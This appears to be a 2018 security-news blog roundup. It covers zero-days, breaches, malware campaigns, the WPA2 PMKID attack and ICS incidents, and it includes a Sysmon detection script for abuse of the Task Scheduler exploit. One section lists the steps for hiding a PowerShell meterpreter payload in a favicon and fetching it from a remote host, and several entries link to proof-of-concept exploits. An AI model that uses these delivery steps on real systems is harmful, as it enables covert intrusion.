PowerPool Malware Uses Windows Zero-Day Posted on Twitter
Read the complete story about how the criminals abused PowerPool for their own gains here at DarkReading and check the original tweet of Will Dormann.
Get the PoC from SandboxEscaper at GitHub.
British Airways: Customer data theft
Around 380,000 personal data records have been stolen by unknown cyber criminals.
The personal and financial details of customers making bookings on ba.com and the airline's mobile app between 22:58 BST August 21, 2018 and 21:45 BST September 5, 2018 were compromised. No passport or travel details were stolen.
Only customers who made bookings or changes to their bookings on ba.com and the airline's mobile app between 22:58 BST August 21, 2018 and 21:45 BST September 5, 2018 are affected.
Names, billing addresses, email addresses and all bank card details were at risk.
Are my saved credit card details safe if they were used to make a booking in that period?
All payment transactions, using either new cards or saved cards, made on ba.com or the mobile app from 22:58 BST August 21, 2018 to 21:45 BST September 5, 2018 inclusive were impacted.
No Executive Club accounts were compromised in the data theft. There is no impact to Avios or details stored with the British Airways Executive Club.
Technical details about how all that worked can be found at the detailed report of:
Did you know that CyberChef from GCHQ is available via Docker?
... well I didn't until I found https://isc.sans.edu/diary/24056
Have fun. :-)
Discovering patterns in network traffic with SiLK
Manuel Humberto Santander Pelaez did a cool write-up about organizing the massive amount of network capture data with a neat tool. If you ever come across analysing your network data for something, this will help you a lot.
Android banker with 190+ targeted banking apps unveiled
Lukas Stefanko has tweeted that he unveiled a banker trojan in several apps.
The mitigation is "Don't trust apps from unknown sources".
Find a list of bad banking apps at pastebin.
Excellent links for our work
I found some very cool URLs that describe and link the tools we should all be aware of to ease our daily work.
Check out my extra page here.
Hackers Stole Personal Data of 2 Million T-Mobile Customers
Motherboard reports a data breach at T-Mobile that exposed the data of 2 million users.
According to two different security researchers, with whom Motherboard shared that hash, it may be an encoded string hashed with the notoriously weak algorithm called MD5, which can potentially be cracked with brute-forcing attacks.
And still they have not learned how to spell security at Big-T.
LOL
Anyway, if you use this provider or one of its subsidiaries, rather change your password soon.
Turla Threat Group Uses Email PDF Attachments to Control Stealthy Backdoor
Erik found a cool article from DarkReading that tells us about a new way of Turla's C2 communication via mailed PDFs.
Remember how APT28 broke into the German Foreign Ministry; well, this is just another way of obfuscating C2 via mail.
"The backdoor is designed to monitor all incoming and outgoing emails from the compromised system and to collect message metadata about the sender, recipient, subject, and attachment name (if any). The data is compiled in logs that are then bundled together and sent periodically to Turla operators in specially crafted PDF documents attached to emails.
The Outlook backdoor also checks all incoming email for PDFs that might contain commands from the attackers. The malware is designed to accept commands from any threat actor that is able to encode them in the right format in a PDF document. If the email address to which the malware typically transmits stolen data is blocked, the threat actor can regain control of the backdoor simply by sending a rogue PDF with a new C2 address.
The main difference from other backdoors is that the operator can initiate the communication with the backdoor while the malware is inspecting emails being downloaded automatically to the inbox,
(Linux) TCP implementations vulnerable to Denial of Service
Again the Carnegie Mellon University is reporting:
Vulnerability Note VU#962459
Description
CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion') - CVE-2018-5390 Linux kernel versions 4.9+ can be forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet, which can lead to a denial of service.
Impact
A remote attacker may be able to trigger a denial-of-service condition against a system with an available open port.
Solution
Apply a patch
Vendor Information
Vendor | Status | Date Notified | Date Updated |
---|---|---|---|
Akamai Technologies, Inc. | Affected | 27 Jul 2018 | 08 Aug 2018 |
Arista Networks, Inc. | Affected | 23 Jul 2018 | 07 Aug 2018 |
Debian GNU/Linux | Affected | 23 Jul 2018 | 07 Aug 2018 |
F5 Networks, Inc. | Affected | 23 Jul 2018 | 09 Aug 2018 |
FreeBSD Project | Affected | 23 Jul 2018 | 08 Aug 2018 |
Juniper Networks | Affected | 23 Jul 2018 | 07 Aug 2018 |
SUSE Linux | Affected | 23 Jul 2018 | 07 Aug 2018 |
Ubuntu | Affected | 23 Jul 2018 | 07 Aug 2018 |
ADTRAN | Not Affected | 23 Jul 2018 | 09 Aug 2018 |
Zyxel | Not Affected | 23 Jul 2018 | 16 Aug 2018 |
3com Inc | Unknown | 23 Jul 2018 | 23 Jul 2018 |
A10 Networks | Unknown | 27 Jul 2018 | 27 Jul 2018 |
ACCESS | Unknown | 23 Jul 2018 | 23 Jul 2018 |
Actelis Networks | Unknown | 27 Jul 2018 | 27 Jul 2018 |
Actiontec | Unknown | 23 Jul 2018 | 23 Jul 2018 |
CVSS Metrics
Group | Score | Vector |
---|---|---|
Base | 7.1 | AV:N/AC:M/Au:N/C:N/I:N/A:C |
Temporal | 6.4 | E:POC/RL:ND/RC:C |
Environmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND |
0-Day: Microsoft Windows task scheduler contains a local privilege escalation vulnerability in the ALPC interface
The Carnegie Mellon University reports:
Vulnerability Note VU#906424
CVSS Metrics
Group | Score | Vector |
---|---|---|
Base | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C |
Temporal | 6.5 | E:F/RL:U/RC:C |
Environmental | 6.4 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND |
References
- https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
- https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
As per Kevin Beaumont:
High level overview
- Needs prior code execution to exploit.
- Exploit currently only works on 64-bit OSes (likely Win 10 and Server 2016).
What is the flaw?
“_SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL. It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here. Before the task scheduler writes the DACL we can create a hard link to any file we have read access over. This will result in an arbitrary DACL write. This PoC will overwrite a printer related dll and use it as a hijacking vector. This is of course one of many options to abuse this.” — source
Ways to detect
- If you use Microsoft Sysmon, look for spoolsv.exe spawning abnormal processes — it’s a sure sign this exploit is being used (or another Spooler exploit). Similarly if you use Sysmon, look for conhost.exe (Task Scheduler) spawning under abnormal processes (e.g. the Print Spooler).
Ways to mitigate
- Antivirus, segmentation, don’t allow untrusted users to run code.
Ways to fix
- Microsoft need to fix the function. This will probably happen in a few weeks.
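A detection check along the lines Beaumont describes, as an added example (not from his article, from Sysmon or from Microsoft): it scans Sysmon Event ID 1 process-creation records for spoolsv.exe spawning children outside an allowlist and for conhost.exe starting under an unusual parent. The key=value record format, the two allowlists and the events themselves are constructed assumptions; tune the allowlists to what your estate actually runs.

```python
"""Flag Sysmon process-creation events (Event ID 1) in which the Print Spooler
spawns an unexpected child, or conhost.exe starts under an unusual parent."""
import re

# Constructed sample events, one per line, reduced to the two fields we need.
SAMPLE_EVENTS = r"""
Image=C:\Windows\System32\spoolsv.exe ParentImage=C:\Windows\System32\services.exe
Image=C:\Windows\System32\PrintIsolationHost.exe ParentImage=C:\Windows\System32\spoolsv.exe
Image=C:\Windows\System32\cmd.exe ParentImage=C:\Windows\System32\spoolsv.exe
Image=C:\Windows\System32\conhost.exe ParentImage=C:\Windows\System32\spoolsv.exe
Image=C:\Windows\System32\conhost.exe ParentImage=C:\Windows\System32\cmd.exe
""".strip()

# Children the spooler legitimately starts (assumption; tune for your estate).
SPOOLER_ALLOWLIST = {"printisolationhost.exe", "splwow64.exe"}
# Parents under which a conhost.exe is ordinary (assumption; tune as well).
CONHOST_ALLOWLIST = {"cmd.exe", "powershell.exe", "svchost.exe", "explorer.exe"}

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Turn 'Key=Value Key=Value' into a dict (values carry no spaces here)."""
    return dict(FIELD_RE.findall(line))

def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'spoolsv.exe'."""
    return path.rsplit("\\", 1)[-1].lower()

def suspicious(event):
    """Return a reason string if the parent/child pair is abnormal, else None."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if parent == "spoolsv.exe" and image not in SPOOLER_ALLOWLIST:
        return f"spoolsv.exe spawned {image}"
    if image == "conhost.exe" and parent not in CONHOST_ALLOWLIST:
        return f"conhost.exe started under {parent}"
    return None

def scan(text):
    """Run every event line through suspicious() and collect the alerts."""
    alerts = []
    for line in text.splitlines():
        reason = suspicious(parse_event(line))
        if reason:
            alerts.append(reason)
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```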
SamSam: The (Almost) Six Million Dollar Ransomware
Sophos has published an excellent analysis report about an "outstanding" ransomware.
Necurs Targeting Banks with PUB File that Drops FlawedAmmyy
Cofense reports that another bank-targeted campaign was running from 7:30 EST on Aug 15 until 15:37 EST. So please check your LMS for "Request BOI" or "Payment Advice <random alpha numeric>" findings that could be related to that campaign.
As per Cofense:
Necurs is a rootkit first observed in 2012. It utilizes multiple Domain Generation Algorithms (DGAs) coupled with .bit domain names as well as P2P communications to remain resilient against shutdown. Necurs became fairly famous when it began sending waves of Dridex and Locky a few years ago. We have noticed an uptick in campaigns originating from the Necurs botnet in recent weeks.
What stood out today is what changed. Necurs for months has been sending a seemingly never-ending stream of typical spam campaigns. Today at 7:30am EST we noticed a new file extension attached to its phishing campaigns: .PUB, which belongs to Microsoft Publisher. Like Word and Excel, Publisher has the ability to embed macros. So just when you are feeling confident about a layered defense protecting you from Malicious Word docs, Necurs adapts and throws you a curveball.
The other eyebrow-raising moment is when it was observed that all of the recipients worked for banks. There were no free mail providers in this campaign, signaling clear intent by the attackers to infiltrate banks specifically.
The emails are fairly basic and appear to be coming from someone in India with the subject of “Request BOI” or “Payment Advice <random alpha numeric>”.
How to embed a powershell meterpreter into your favicon.ico
This reads like a charm and will stay completely under the radar when accessing a malicious site that serves a malformed favicon.
Read the post of Penetration Testing Labs.
In short:
Using Kali:
• echo 'mkdir halloworld' > shellcode.txt
• python create_favicon.py shellcode.txt evil.png
• service apache2 start
• mv evil.png /var/www/html/favicon.ico
Using Windows:
• PowerShell with admin rights
◦ Set-ExecutionPolicy unrestricted
◦ Import-Module .\readFavicon.ps1
◦ Get-FaviconText -URL http://192.168.10.99/favicon.ico -WriteTo $env:TEMP
Hacking the Fax (by Checkpoint research)
I personally love it when things come true that you had not thought of before.
In the PoC below, Check Point shows us how to break a common all-in-one fax machine via the analog phone line.
The technical article of the researchers is worth reading, as it gives the interested party a lot of insight into how these machines are built and what cheap devices we all have in our network.
This all comes to life through the fact that a colour fax is written directly into a corresponding JPG file without any sanitizing of the data. When the fax machine then processes this file, it ends up in a buffer overflow that can be used to own the complete fax machine.
Once the device is owned, EternalBlue is used to compromise machines on the IP network attached to the fax.
This might open a completely new way of attack, as the fax machine is assumed not to be an entry point into the network at all. Because of that, these devices are not specially secured and are usually not specially segregated from other important devices.
My personal respect to the research team for finding this vuln. ;-)
Airbus - We make it fly ...
Airbus Zephyr S (a High Altitude Pseudo-Satellite to provide low orbit Internet access in future) reached a new world record as the longest solar-powered flight (26 days) ever.
Read The Engineer:
Taking off on 11th July in Arizona, USA, the unmanned Zephyr S HAPS (High Altitude Pseudo-Satellite) was airborne for 25 days, 23 hours and 57 minutes, a duration Airbus hopes to have confirmed as a world record in the coming days. Zephyr employs a 25m wingspan covered in solar panels to power its flight and charge its lithium-sulphur batteries, allowing it to cruise in the stratosphere for extreme lengths of time.
I'm proud to be an Airbus'er ... !!!
WPA2 is dead, long live WPA2
Jens Steube was analyzing the new WPA3 protocol for security weaknesses and "accidentally" found a serious weakness in the WPA2 PSK RSN PMKID function.
Jens is sharing the tools and a PoC at hashcat for educational purposes.
While the "old" technique was limited by having to capture a complete EAPOL 4-way handshake sequence, the "new" way only needs to get hold of a single EAPOL frame.
His comment on hashcat especially emphasizes the new enhancements of his technique as:
The main advantages of this attack are as follows:
- No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
- No more waiting for a complete 4-way handshake between the regular user and the AP
- No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
- No more eventual invalid passwords sent by the regular user
- No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
- No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
- No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string
For me personally, this asks for a proof of concept breaking into my own WLAN at the next free time I find. So stay tuned.
Hackers gain access to thousands of Swiss email accounts
The Swiss "SonntagsZeitung" (Sunday newspaper) is reporting that around 15,000 Swiss email accounts, which "belonged to employees of various state administration bodies, companies close to the state, universities, and other official organizations" (as SwissInfo reports), are being used to blackmail their owners.
The problem, besides the reputational and informational issues such an attack has, is rather the fact that this information can and will be used in phishing and other attempts to infiltrate further entities. Especially state-related companies like the (in)famous RUAG might be in danger (again), as already happened at RUAG in 2016.
So please, don't use your office mail to do private stuff and be vigilant when opening mail (even from known senders).
Banking: Trickbot campaign spoofing Chase Bank “Important account documents”
Did you see this email in your inbox?
DO NOT OPEN, it's trying to fool you. :-)
ICS/SCADA: Flaws Expose Siemens Protection Relays to DoS Attacks (TCP:102)
Read the SecurityWeek article here.
Siemens has informed customers that some of the company’s SIPROTEC protection relays are exposed to denial-of-service (DoS) attacks due to a couple of vulnerabilities present in the EN100 communication module.
Researchers at ScadaX, an independent group of experts focusing on ICS and IoT security, discovered that the EN100 module and SIPROTEC 5 relays are impacted by two DoS vulnerabilities that can be exploited by sending specially crafted packets to the targeted device’s TCP port 102.
Exploitation of the flaws causes the device’s network functionality to enter a DoS condition, which Siemens says compromises the system’s availability. Manual intervention is required to restore the impacted service.
An attacker needs access to the targeted organization’s network and IEC 61850-MMS communication needs to be enabled in order to exploit the flaws, but no user interaction is required.
The vulnerabilities are similar, but one of them, tracked as CVE-2018-11451, has been classified as “high severity,” while the other, CVE-2018-11452, which impacts the EN100 module if oscillographs are running, has been rated “medium severity.” Siemens noted that SIPROTEC 5 relays are only affected by the more serious flaw.
See a quick shodan view of TCP:102 open to the Internet
ICS/SCADA: Ukraine Security Service Stops VPNFilter Attack at Chlorine Station
Another ICS/SCADA topic that DarkReading is writing about.
Interfax-Ukraine reported that the LLC Aulska station in Auly was hit with a VPNFilter infection intended to disrupt operations at the chlorine station.
"Specialists of the cyber security service established minutes after [the incident] that the enterprise's process control system and system for detecting signs of emergencies had deliberately been infected by the VPNFilter computer virus originating from Russia. The continuation of the cyber attack could have led to a breakdown in technological processes and a possible accident," the SBU wrote on its Facebook page, according to the report.
[....]
ICS/SCADA expert Robert Lee says the initial reports out of Ukraine don't provide sufficient details to confirm the attack could have caused a physical attack. "What we know right now about VPNFilter indicates that there was nothing in the malware to support the scenario of physical damage and operational impact that was described," says Lee, CEO and founder of Dragos.
He says there are other possible scenarios for a physical attack, such as the attackers "directly using that access," but the SBU's report doesn't specifically indicate that.
"In this case we need more details," he says. "Obviously the SBU is doing good work, but the rest of the community would benefit from more insight, as the scenario presented leaves many questions."